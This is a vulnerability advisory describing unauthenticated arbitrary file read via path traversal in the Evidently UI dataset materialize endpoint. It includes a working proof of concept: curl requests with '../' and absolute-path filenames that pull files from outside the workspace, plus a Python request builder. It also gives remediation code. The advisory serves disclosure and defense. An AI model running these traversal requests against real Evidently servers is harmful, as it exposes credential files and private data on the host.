Summary
The Evidently UI service exposes a dataset "materialize from source" endpoint that accepts a fully attacker-controlled filename and passes it, without any containment check, to the local blob storage, which opens it at posixpath.join(base_path, filename). Because posixpath.join preserves ../ segments and lets an absolute path replace the base, an attacker can read any .csv or .parquet file on the host filesystem, including files outside the workspace directory, and then download its contents through the dataset download endpoint.
In the default configuration (evidently ui, started without a secret), the service runs with NoSecurityComponent, so every endpoint is unauthenticated. The result is unauthenticated arbitrary file read over the network.
Affected Versions
Confirmed on v0.7.21 (latest release). The vulnerable code path is present in the evidently.ui.service package.
Details
The endpoint POST /api/datasets/materialize (src/evidently/ui/service/api/datasets.py) builds a data source from the request body and materializes it:
@post("/materialize")
async def materialize_from_source(
    data: MaterializeDatasetRequest,
    dataset_manager: ...,
    user_id: UserID,
    project_id: ProjectID,
) -> MaterializeDatasetResponse:
    df = await data.source.to_data_source(user_id=user_id, project_id=project_id).materialize(dataset_manager)
    dataset = await dataset_manager.upload_dataset(...)  # stores df as a new dataset you can download
    return MaterializeDatasetResponse(dataset_id=dataset.id)
When the source is a FileDataSource (src/evidently/ui/service/datasets/data_source.py), filename is taken verbatim from the request:
class FileDataSource(SortedFilteredDataSource):
    project_id: ProjectID
    filename: str
    is_tmp: bool = False

    def read(self, storage):
        df = FileIO(storage).read_file_from_storage(self.project_id, self.filename)
        return df
FileIO.read_file_from_storage (src/evidently/ui/service/datasets/file_io.py) only validates the file extension, then reads the path as a blob id:
def read_file_from_storage(self, project_id, file_id):
    _, file_extension = os.path.splitext(file_id)
    if file_extension not in self.ALLOWED_FILE_READERS.keys():  # .csv / .parquet only
        raise HTTPException(status_code=400, detail="Extension not allowed")
    file_content = self.file_storage.get_dataset(file_id)  # file_id == attacker filename
    ...
DatasetFileStorage.get_dataset(blob_id) -> BlobStorage.get_blob_data(blob_id) -> FSSpecBlobStorage.open_blob -> FSLocation.open (src/evidently/ui/service/storage/fslocation.py):
@contextlib.contextmanager
def open(self, path: str, mode="r"):
    with self.fs.open(posixpath.join(self.path, path), mode) as f:
        yield f
There is no normalization or base-directory containment. posixpath.join("workspace", "../../../../etc/x.csv") escapes the workspace, and posixpath.join("workspace", "/tmp/x.csv") discards the base entirely and reads the absolute path.
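The two join behaviours described above can be reproduced with the standard library alone. This is a minimal sketch: the relative base "workspace" is a stand-in for the storage root, not a value read from Evidently.

```python
import posixpath

base = "workspace"  # hypothetical storage root, standing in for FSLocation.path

# Relative traversal: join keeps the ".." segments as-is.
traversal = posixpath.join(base, "../../../../etc/x.csv")
# normpath shows where those segments resolve: above the base directory.
resolved = posixpath.normpath(traversal)

# Absolute path: join discards every component before the absolute one.
absolute = posixpath.join(base, "/tmp/x.csv")

print(traversal)  # workspace/../../../../etc/x.csv
print(resolved)   # ../../../etc/x.csv
print(absolute)   # /tmp/x.csv
```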
The materialized rows are then stored as a normal dataset and can be retrieved verbatim through the unauthenticated read routes GET /api/datasets/{id}/download and GET /api/datasets/{id}.
The only restriction is the extension allowlist (.csv, .parquet). These formats commonly contain database dumps, credential exports, model training data, and PII on the same host.
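A short sketch of why the extension check does not constrain the directory: os.path.splitext inspects only the suffix of the string. The ALLOWED_EXTENSIONS set and the extension_allowed helper are illustrative names that mirror the allowlist described above; they are not Evidently's own code.

```python
import os

# Assumed to mirror the .csv / .parquet allowlist described above.
ALLOWED_EXTENSIONS = {".csv", ".parquet"}


def extension_allowed(file_id: str) -> bool:
    """Return True when the suffix is allowlisted; the directory part is never examined."""
    _, ext = os.path.splitext(file_id)
    return ext in ALLOWED_EXTENSIONS


payloads = [
    "../../../../../../tmp/secret_outside.csv",  # relative traversal
    "/tmp/abs_secret.csv",                       # absolute path
    "/etc/passwd",                               # no allowlisted suffix
]
results = {p: extension_allowed(p) for p in payloads}
for payload, allowed in results.items():
    print(f"{payload!r}: {'passes' if allowed else 'rejected'}")
```

Both traversal payloads pass the check; only the file without an allowlisted suffix is rejected.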
Proof of Concept
Prerequisites:
- pip install evidently==0.7.21
- A sensitive .csv file outside the workspace, simulating any data export / credential file on the host.
Steps:
- Create a sensitive file outside the workspace:
printf 'secret_col,value\nADMIN_DB_PASSWORD,hunter2_supersecret\n' > /tmp/secret_outside.csv
- Start the Evidently UI with its default configuration (no secret = no authentication):
mkdir -p /tmp/ev_run/workspace
cd /tmp/ev_run
python -c "from evidently.ui.service.app import run_local; run_local(host='127.0.0.1', port=8011, workspace='/tmp/ev_run/workspace')"
- Create a project (unauthenticated):
curl -s -X POST http://127.0.0.1:8011/api/projects \
  -H 'Content-Type: application/json' \
  -d '{"name":"poc","description":"x"}'
Output:
"019ecac5-bf25-7a67-85ab-b2071b844ca1"
- Materialize a dataset from a traversal filename (PROJECT_ID from step 3):
curl -s -X POST "http://127.0.0.1:8011/api/datasets/materialize?project_id=019ecac5-bf25-7a67-85ab-b2071b844ca1" \
  -H 'Content-Type: application/json' \
  -d '{
    "name": "stolen",
    "source": {
      "type": "evidently:data_source_dto:FileDataSourceDTO",
      "filename": "../../../../../../tmp/secret_outside.csv"
    }
  }'
Output:
{"dataset_id":"019ecac6-2ade-776e-bf50-a6ae18a25521"}
- Download the stolen file contents:
curl -s "http://127.0.0.1:8011/api/datasets/019ecac6-2ade-776e-bf50-a6ae18a25521/download?format=csv"
Output (contents of /tmp/secret_outside.csv, which lives outside the workspace):
secret_col,value
ADMIN_DB_PASSWORD,hunter2_supersecret
An absolute path works identically (the join discards the workspace base):
printf 'k,v\nABSOLUTE_READ,works\n' > /tmp/abs_secret.csv
curl -s -X POST "http://127.0.0.1:8011/api/datasets/materialize?project_id=019ecac5-bf25-7a67-85ab-b2071b844ca1" \
  -H 'Content-Type: application/json' \
  -d '{"name":"abs","source":{"type":"evidently:data_source_dto:FileDataSourceDTO","filename":"/tmp/abs_secret.csv"}}'
# -> {"dataset_id":"019ecac6-686e-7e6d-9afe-23697614e585"}
curl -s "http://127.0.0.1:8011/api/datasets/019ecac6-686e-7e6d-9afe-23697614e585/download?format=csv"
# -> k,v
# ABSOLUTE_READ,works
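For regression testing a patched build, the materialize request from the steps above can also be built in Python. This is a sketch only: build_materialize_request is a hypothetical helper, the dataset name is arbitrary, and the URL, project ID, and payload shape are copied from the curl commands in this report. The code builds the request but does not send it.

```python
import json
import urllib.parse
import urllib.request


def build_materialize_request(base_url: str, project_id: str, filename: str) -> urllib.request.Request:
    """Build (without sending) the POST /api/datasets/materialize request."""
    query = urllib.parse.urlencode({"project_id": project_id})
    body = {
        "name": "poc-dataset",  # arbitrary dataset name
        "source": {
            "type": "evidently:data_source_dto:FileDataSourceDTO",
            "filename": filename,  # the attacker-controlled value
        },
    }
    return urllib.request.Request(
        f"{base_url}/api/datasets/materialize?{query}",
        data=json.dumps(body).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


req = build_materialize_request(
    "http://127.0.0.1:8011",
    "019ecac5-bf25-7a67-85ab-b2071b844ca1",
    "/tmp/abs_secret.csv",
)
print(req.get_method(), req.full_url)
```

Passing req to urllib.request.urlopen against a test instance you control sends it; a fixed build would be expected to answer with an error rather than a dataset_id.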
Impact
An unauthenticated remote attacker (or, when a token is configured, any authenticated user) can read arbitrary .csv and .parquet files anywhere on the server filesystem and exfiltrate their full contents. This discloses database exports, credential/secret files, training datasets, and other tenant data stored on the host, regardless of the project the attacker can access.
Suggested Remediation
Resolve and contain the requested path before opening it. For example, in FSLocation.open (and the other path-taking methods) reject absolute paths and normalize/verify the result stays under self.path:
def _safe(self, path: str) -> str:
    full = posixpath.normpath(posixpath.join(self.path, path))
    base = posixpath.normpath(self.path)
    if full != base and not full.startswith(base + posixpath.sep):
        raise PermissionError("path escapes storage root")
    return full
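The same check can be exercised as a standalone function against the payloads from the proof of concept. In this sketch, safe_join and is_contained are illustrative names, and the base directory is the workspace path used in the PoC. The comparison is purely lexical: normpath does not resolve symlinks, so a symlink inside the workspace that points elsewhere would need separate handling.

```python
import posixpath


def safe_join(base: str, path: str) -> str:
    """Join path onto base and raise PermissionError if the result leaves base."""
    full = posixpath.normpath(posixpath.join(base, path))
    root = posixpath.normpath(base)
    # Appending the separator keeps sibling directories such as
    # "<root>_evil" from matching on a bare string prefix.
    if full != root and not full.startswith(root + posixpath.sep):
        raise PermissionError("path escapes storage root")
    return full


def is_contained(base: str, path: str) -> bool:
    """Convenience wrapper: True when safe_join accepts the path."""
    try:
        safe_join(base, path)
        return True
    except PermissionError:
        return False


BASE = "/tmp/ev_run/workspace"  # workspace directory from the PoC
checks = {
    "datasets/a.csv": is_contained(BASE, "datasets/a.csv"),
    "../../../../../../tmp/secret_outside.csv": is_contained(BASE, "../../../../../../tmp/secret_outside.csv"),
    "/tmp/abs_secret.csv": is_contained(BASE, "/tmp/abs_secret.csv"),
    "../workspace_evil/x.csv": is_contained(BASE, "../workspace_evil/x.csv"),
}
for candidate, ok in checks.items():
    print(f"{candidate!r}: {'allowed' if ok else 'blocked'}")
```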
Additionally, in read_file_from_storage / FileDataSource, validate that filename contains no path separators or .. segments, and resolve dataset files only by their stored blob id rather than a client-supplied path.
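A minimal sketch of the filename validation suggested here, assuming stored files are addressed by a bare name with no directory component. The helper name is_plain_filename is hypothetical and not part of Evidently.

```python
def is_plain_filename(filename: str) -> bool:
    """Accept only a bare file name: non-empty, no separators, not '.' or '..'."""
    if not filename or filename in {".", ".."}:
        return False
    # Reject both POSIX and Windows separators so the check does not
    # depend on the platform the service runs on.
    if "/" in filename or "\\" in filename:
        return False
    return True


samples = ["data.csv", "../../tmp/secret_outside.csv", "/tmp/abs_secret.csv", "..", ""]
verdicts = {name: is_plain_filename(name) for name in samples}
for name, ok in verdicts.items():
    print(f"{name!r}: {'accepted' if ok else 'rejected'}")
```

Rejecting separators outright is stricter than path normalization, which suits identifiers that are never meant to carry a directory part.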